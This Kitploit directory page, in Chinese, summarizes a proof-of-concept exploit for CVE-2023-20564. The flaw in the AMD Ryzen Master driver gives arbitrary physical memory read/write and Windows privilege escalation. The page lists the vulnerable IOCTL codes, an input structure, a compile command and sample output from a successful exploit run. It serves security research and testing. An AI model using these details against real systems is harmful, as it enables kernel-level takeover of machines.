Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-20564 — 针对CVE-2023-20564的概念验证漏洞利用程序,通过AMD Ryzen Master Driver的IOCTL处理程序实现任意物理内存读写,从而在Windows上实现权限提升。 | Kitploit
工具/GitHubGitHub/ntgabrielgomes/cve-2023-20564
权限提升内存取证漏洞分析漏洞利用渗透测试硬件安全二进制利用
GitHubntgabrielgomes/cve-2023-20564

CVE-2023-20564

针对CVE-2023-20564的概念验证漏洞利用程序,通过AMD Ryzen Master Driver的IOCTL处理程序实现任意物理内存读写,从而在Windows上实现权限提升。

查看仓库
20328个月前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2023-20564 - AMD Ryzen Master 驱动程序物理内存访问 PoC

CVSS Platform

概述

此存储库包含一个概念验证 (PoC),演示了 AMD Ryzen Master 驱动程序中的漏洞 CVE-2023-20564。该漏洞允许无特权的用户读写任意物理内存,从而导致潜在的特权提升和系统入侵。

漏洞详情

  • CVE 编号:CVE-2023-20564
  • CVSS 评分:8.8 (高危)
  • 供应商:AMD
  • 产品:AMD Ryzen Master 驱动程序
  • 受影响版本:多个 AMD Ryzen Master 软件版本
  • 影响:物理内存读写访问,导致特权提升

技术描述

AMD Ryzen Master 驱动程序 (AMDRyzenMasterDriverV17.sys) 在其 IOCTL 处理程序中存在验证不足的问题,具体来说:

  • 读取 IOCTL:0x81112F08 - 允许读取任意物理内存
  • 写入 IOCTL:0x81112F0C - 允许写入任意物理内存

该驱动程序未能正确验证:

  1. 物理内存地址
  2. 大小边界
  3. 受保护的内存区域

这使得恶意应用程序能够:

  • 读取敏感的内核数据结构
  • 修改关键系统组件
  • 绕过 Windows 内核保护
  • 在内核模式下实现任意代码执行

所需文件

  • AMDRyzenMasterDriverV17.sys - 易受攻击的驱动程序文件
  • 来自此存储库的源代码

2. 编译 PoC

root@kitploit:~
# manually
g++ -std=c++17 poc_demo.cpp -o poc_demo.exe -ladvapi32

关键组件

内存结构

root@kitploit:~
typedef struct _AMDReadStructure {
    LARGE_INTEGER PhysAddr;     // Physical address to read
    LARGE_INTEGER SizeAndData;  // Size and data buffer
    CHAR Buffer[1];             // Variable data buffer
} AMDReadStructure, *PAMDReadStructure;

核心函数

  • ReadPhysicalMemory() - 从物理内存读取
  • WritePhysicalMemory() - 写入物理内存
  • TestReadWriteVerify() - 完整测试序列
  • InstallDriverService() - 驱动程序安装
  • StopAndRemoveDriverService() - 驱动程序清理

示例输出

root@kitploit:~
===========================================
  AMD Ryzen Master Driver - Memory PoC    
===========================================

[*] Installing and starting driver service...
[+] Driver file found
[+] Service created successfully
[+] Service started successfully

[*] Initializing driver connection...
[+] Driver connection established successfully

[!] TESTING READ/WRITE/VERIFY SEQUENCE

[STEP 1] Reading original data...
[*] Reading 8 bytes from physical address 0x100000
[*] PHYSICAL MEMORY READ SUCCESS!
    Read 8 bytes from 0x100000
    Data: 4D 5A 90 00 03 00 00 00

[STEP 2] Writing test data...
[*] Writing 8 bytes to physical address 0x100000
    Data: DE AD BE EF CA FE BA BE
[*] PHYSICAL MEMORY WRITE SUCCESS!
    Wrote 8 bytes to 0x100000

[STEP 3] Verifying written data...
[*] Reading 8 bytes from physical address 0x100000
[*] PHYSICAL MEMORY READ SUCCESS!
    Data: DE AD BE EF CA FE BA BE

[*] DATA VERIFICATION SUCCESS! Write/Read works correctly!

技术分析

IOCTL 处理程序分析

该易受攻击的驱动程序暴露了两个主要的 IOCTL:

  1. 物理内存读取 (0x81112F08)

    • 输入:物理地址 + 大小
    • 输出:指定地址的内存内容
    • 未验证地址范围
  2. 物理内存写入 (0x81112F0C)

    • 输入:物理地址 + 大小 + 数据
    • 输出:无
    • 未验证受保护内存区域

参考资料

  • CVE-2023-20564 - MITRE
  • NVD 条目
  • AMD 安全公告
  • Windows 驱动程序安全最佳实践

提醒:此工具仅用于授权的安全测试。在任何系统上进行测试前,请务必获得适当授权。

下载工具